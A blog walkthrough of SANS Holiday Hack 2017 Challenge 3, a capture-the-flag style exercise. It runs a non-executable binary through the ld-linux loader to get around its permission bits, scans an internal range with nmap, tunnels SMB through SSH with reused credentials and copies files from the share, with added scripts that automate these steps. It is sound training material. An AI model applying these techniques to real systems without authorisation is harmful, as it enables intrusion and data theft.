Fun with Flags - Sans Holiday Hack 2017 Challenge 3
Read Time: 10 Minutes
Note: at the time of writing, the system holding the live screenshots of steps 1 through 4 below is under maintenance. This post will be updated with fresh images of that sequence once the maintenance is complete.
Keeping to the "Fun with Flags" theme, this post demonstrates how I solved the third challenge of the SANS Holiday Hack 2017. Building on my last couple of posts (see Challenge 1 and Challenge 2), I show how the console challenge was solved and the hacking required to capture the actual flag.
Figure 1: Fun with Flags Staarfaenger
For Challenge 3 the following question is posed:
"The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?"
The hint "...please see Holly Evergreen in the Cryokinetic Magic Level" is provided. Heading over to that level, we locate the terminal for this challenge, shown in Figure 2: Finding the Third Terminal.
Figure 2: Finding the Third Terminal
A left click on the terminal opens a console whose banner states the challenge (see Figure 3: Challenge 3 Terminal).
Figure 3: Challenge 3 Terminal
As in Challenges 1 and 2, the first step is reading comprehension: sorting out exactly what needs to be done. The key words are underlined in Figure 4: Challenge 3 Terminal What Next?.
Figure 4: Challenge 3 Terminal What Next?
Figure 4 references a file called CandyCaneStriper that needs to be run as an executable. That raises two questions:
1. Where is this file?
2. Why won't it start?
Both questions were answered with the "ls" command and the switches "-liah", giving the complete command "ls -liah", as seen in Figure 5: We find our target. This command lists the contents of my current working directory (see the pwd command result), and each switch adds the following:
1. -l = "use a long listing format" (owner, group, permission bits and size for each entry)
2. -i = "print the index number of each file", i.e. the inode number the filesystem uses to identify the file on disk
3. -a = show all, i.e. "do not ignore entries starting with ."
4. -h = make the sizes human readable: "with -l and -s, print sizes like 1K 234M 2G etc"
Figure 5: We find our target
Figure 5 shows our executable, CandyCaneStriper. Notice, however, that we are logged in as elf while the owner of the file is root. Worse, the file is read-only for everyone except the owner (root) and members of the root group, and the permission bits do not grant us execute. (See more about understanding Linux terminals here and Linux file permissions here.)
Figure 6: A little Closer
Given our identity and the permission bits on CandyCaneStriper, we would normally have to change the file's mode before we could run it. The usual way is "chmod +x", which adds the missing execute permission. But we are not the owner of the file, so chmod is refused. Instead we hand the file to the dynamic loader, ld-linux: the kernel checks the execute bit only when execve() is called on the file itself, while the loader merely needs to read the file to map it into memory, so invoking the loader directly with the binary as its argument sidesteps the missing bit. In Figure 7: We did it we use the 64-bit version of the loader, as described here.
Figure 7: We did it
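To show what the loader trick actually relies on, here is an added example of my own (not a command from the challenge terminal or from the post): it copies /usr/bin/true as a stand-in for CandyCaneStriper, removes its execute bits, and shows that a direct run is refused while running it through ld-linux succeeds. The loader paths it probes, the stand-in binary and the temporary directory are assumptions about the reader's machine; the challenge system is not involved.

```shell
#!/bin/sh
# Added example: run a dynamically linked ELF that has no execute bit by
# handing it to the dynamic loader. /usr/bin/true stands in for
# CandyCaneStriper (assumption: a glibc or musl Linux box with coreutils
# or busybox); nothing here comes from the challenge system.

# Locate the glibc or musl loader for this machine (first match wins).
find_loader() {
  for l in /lib64/ld-linux-x86-64.so.2 /lib/ld-linux-aarch64.so.1 \
           /lib/ld-musl-*.so.1 /lib/ld-linux*.so.* /lib64/ld-linux*.so.*; do
    if [ -x "$l" ]; then
      printf '%s\n' "$l"
      return 0
    fi
  done
  return 1
}

# Run "$@" through the loader instead of execve(): the kernel refuses to
# execve a file without an x bit, but the loader only mmap()s a file it can read.
run_via_loader() {
  loader=$(find_loader) || return 2
  "$loader" "$@"
}

# Reproduce the challenge: copy a binary, strip its execute bits, then compare
# direct execution with execution through the loader. Prints "denied ok".
demo() {
  src=""
  for c in /usr/bin/true /bin/true; do
    [ -f "$c" ] && { src=$c; break; }
  done
  [ -n "$src" ] || return 3
  tmp=$(mktemp -d) || return 3
  # The copy keeps the name "true" because multi-call builds (busybox)
  # dispatch on argv[0]; the permission bits are what matter here.
  cp "$src" "$tmp/true"
  chmod 0644 "$tmp/true"          # rw-r--r--: readable, not executable

  if "$tmp/true" 2>/dev/null; then direct=ok; else direct=denied; fi
  if run_via_loader "$tmp/true" 2>/dev/null; then viald=ok; else viald=fail; fi

  rm -rf "$tmp"
  printf '%s %s\n' "$direct" "$viald"
}

demo
```

The lesson cuts both ways: clearing the execute bit on a readable, dynamically linked binary does not stop a user from running it, so a hardening rule that relies on that alone is hollow. Denying read access, or mounting the filesystem noexec (which the kernel also enforces on PROT_EXEC mappings), is what actually closes this path.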
By solving this console challenge we get clues for the actual hacking portion of the event: to "...identify and enumerate the SMB file-sharing server..." and determine "...the file server share name". In Figure 8: First Set of Hints we start to unfold how to get into the SMB server:
Figure 8: First Set of Hints
From this set of hints we gather the following: we will need to find the SMB server with the network discovery tool Nmap, Alabaster likes to reuse the same passwords, and SSH tunneling will be our path into the internal network behind the Letters to Santa server. In Figure 9: Second Set of Hints we learn the technical details of using SSH and the different options for connecting to an SMB share depending on the operating system the participant is using:
Figure 9: Second Set of Hints
The hints reveal how to use SSH on Linux, SSH via PuTTY on Windows, the exact SSH syntax on Linux, and the exact syntax for the smbclient utility on Linux.
Rather than following the hints verbatim, I found it easier to use a variant of them. The sequence I followed, with an explanation of each step, is below:
1. Scan for hosts offering SMB (TCP 445) from the Letters to Santa server:
nmap -Pn -PS445 10.142.0.0/24
- nmap = name of the executable to run
- -Pn = treat every host as up and skip the ping (host discovery) phase
- -PS445 = a TCP SYN "ping" to port 445, which is a host discovery probe; because -Pn skips host discovery this option has no effect here, and the host was actually found by nmap's default port scan, which includes 445. To scan only that port, use -p 445 instead (nmap -Pn -p 445 --open 10.142.0.0/24).
- 10.142.0.0/24 = scan every host in the range 10.142.0.1 through 10.142.0.254 (the same /24 as the 10.142.0.7 target in step 2)
For reference: the nmap manual can be found here, standard TCP ports here, what a ping (ICMP echo request/reply) is here, and how CIDR notation works here. The target CIDR range comes from the scope given on the introductory page of the SANS Holiday Hack 2017:
Figure 10: Scope defined by CIDR notation
2. Having found that the host at .7 was running SMB, I set up SSH port forwarding so that my SMB client could reach it:
ssh -L 445:10.142.0.7:445 alabaster_snowball@X.185.84.51
- ssh = name of the executable to run
- -L 445:10.142.0.7:445 = listen on local port 445 and forward every connection to it, through the SSH session, to 10.142.0.7 port 445. Binding a local port below 1024 requires root on the client; a non-root alternative is an unprivileged local port such as -L 4445:10.142.0.7:445.
- alabaster_snowball@X.185.84.51 = log in as "alabaster_snowball" to X.185.84.51 (the public IP of the Letters to Santa server at the time of the competition; the first octet is redacted here)
3. Through the tunnel I connected my SMB client to the server:
nautilus smb://127.0.0.1
- nautilus = name of the executable to run (the GNOME file manager)
- smb://127.0.0.1 = use the SMB protocol (i.e. connect to port 445) on 127.0.0.1, which is my own forwarded local port. With the forward from step 2 in place, this connection lands on 10.142.0.7 port 445, and the share names listed there answer the challenge question.
4. Then I simply copied all the files to my local system and hashed the Great Book page:
sha1sum ./GreatBookPage3.pdf
- sha1sum = name of the executable to run; it produces the SHA-1 hash used to check in flags
- ./GreatBookPage3.pdf = tells the executable to hash the file named "GreatBookPage3.pdf" in my current directory
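The same four steps, rewritten as an added example of my own so that they work from a non-root client (this is not the post's original command sequence): a parser that pulls SMB hosts out of grepable nmap output, a tunnel on an unprivileged local port, smbclient pointed at that port with -p, and the hash at the end. The target 10.142.0.7, the bastion X.185.84.51 and the user name come from the steps above; the scan output is constructed to look like `nmap -oG -` output and is not real data; SHARE is a placeholder for whatever share name the listing reveals.

```shell
#!/bin/sh
# Added example (not the post's own commands): steps 1 to 4 for a non-root
# client. Scan output below is constructed, not captured; host, bastion and
# user names are taken from the post; SHARE is a placeholder.

# Step 1 helper: from grepable nmap output, print the IPs with 445/tcp open.
# Intended input: nmap -Pn -p445 --open -oG - 10.142.0.0/24
smb_hosts() {
  awk '/^Host:/ && /Ports:/ && /[ ,]445\/open\/tcp/ { print $2 }'
}

# Constructed sample of that grepable output (two hosts, one with SMB).
sample_scan() {
  printf '%s\n' \
    '# Nmap 7.60 scan initiated (constructed sample)' \
    'Host: 10.142.0.2 ()  Status: Up' \
    'Host: 10.142.0.2 ()  Ports: 22/open/tcp//ssh///, 445/closed/tcp//microsoft-ds///' \
    'Host: 10.142.0.7 ()  Status: Up' \
    'Host: 10.142.0.7 ()  Ports: 445/open/tcp//microsoft-ds///' \
    '# Nmap done (constructed sample)'
}

# Step 2: binding local port 445 needs root, so forward an unprivileged local
# port instead. -N opens the tunnel without a remote shell.
tunnel_cmd() {   # $1 target ip, $2 local port, $3 user@bastion
  printf 'ssh -N -L %s:%s:445 %s' "$2" "$1" "$3"
}

# Step 3: smbclient reaches the forwarded port with -p; -L lists the shares,
# which is where the share name answer comes from.
list_shares_cmd() {   # $1 local port, $2 smb user
  printf 'smbclient -L 127.0.0.1 -p %s -U %s' "$1" "$2"
}

# Step 4: hash the retrieved page and keep only the digest.
digest_of() {   # $1 file
  sha1sum "$1" | awk '{ print $1 }'
}

main() {
  target=$(sample_scan | smb_hosts | head -n 1)
  echo "SMB host found: $target"
  echo "$(tunnel_cmd "$target" 4445 alabaster_snowball@X.185.84.51) &"
  list_shares_cmd 4445 alabaster_snowball; echo
  # Fetch the page once the listing has revealed the share name (placeholder SHARE).
  echo "smbclient //127.0.0.1/SHARE -p 4445 -U alabaster_snowball -c 'get GreatBookPage3.pdf'"
  echo "sha1sum ./GreatBookPage3.pdf   # via digest_of"
}
main
```

The parser is the part worth keeping: `--open -oG -` gives one line per host that is trivial to filter, so the whole discovery step can feed the tunnel command without reading a screen by hand.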
Please leave comments below and I look forward to sharing more experiences that I have with my readership.
References
- The Big Bang Theory fansite. "Fun with Flags". https://the-big-bang-theory.com/fun_with_flags/
- SANS. "The 2017 SANS Holiday Hack Challenge". https://holidayhackchallenge.com/2017/
- Peter Staarfaenger. Digital First Response blog. "Fun with Flags - Sans Holiday Hack 2017 Challenge 1". https://digitalfirstresponse.blogspot.com/2018/01/fun-with-flags-sans-holiday-hack-2017.html
- man7.org. Linux man pages. "ls(1)". http://man7.org/linux/man-pages/man1/ls.1.html
- man7.org. Linux man pages. "pwd(1)". http://man7.org/linux/man-pages/man1/pwd.1.html
- DigitalOcean. Tutorials. "An Introduction to the Linux Terminal". https://www.digitalocean.com/community/tutorials/an-introduction-to-the-linux-terminal
- Arch Linux Wiki. "File Permissions and Attributes". https://wiki.archlinux.org/index.php/File_permissions_and_attributes
- Nmap. "Nmap: the Network Mapper - Free Security Scanner". https://nmap.org/
- Ubuntu Wiki. "SSH/OpenSSH/PortForwarding". https://help.ubuntu.com/community/SSH/OpenSSH/PortForwarding
- Devolutions blog. "How to configure an SSH tunnel on PuTTY". https://blog.devolutions.net/2017/4/how-to-configure-an-ssh-tunnel-on-putty
- die.net. Linux man pages. "nmap(1)". https://linux.die.net/man/1/nmap
- Internet Assigned Numbers Authority (IANA). "Service Name and Transport Protocol Port Number Registry". https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?&page=8
- die.net. Linux man pages. "ping(8)". https://linux.die.net/man/8/ping
- Internet Engineering Task Force (IETF). RFC 792, "Internet Control Message Protocol". https://tools.ietf.org/html/rfc792
- Wikipedia. "Classless Inter-Domain Routing" (CIDR). https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing
- SANS. "The 2017 SANS Holiday Hack Challenge" (scope definition). https://holidayhackchallenge.com/2017/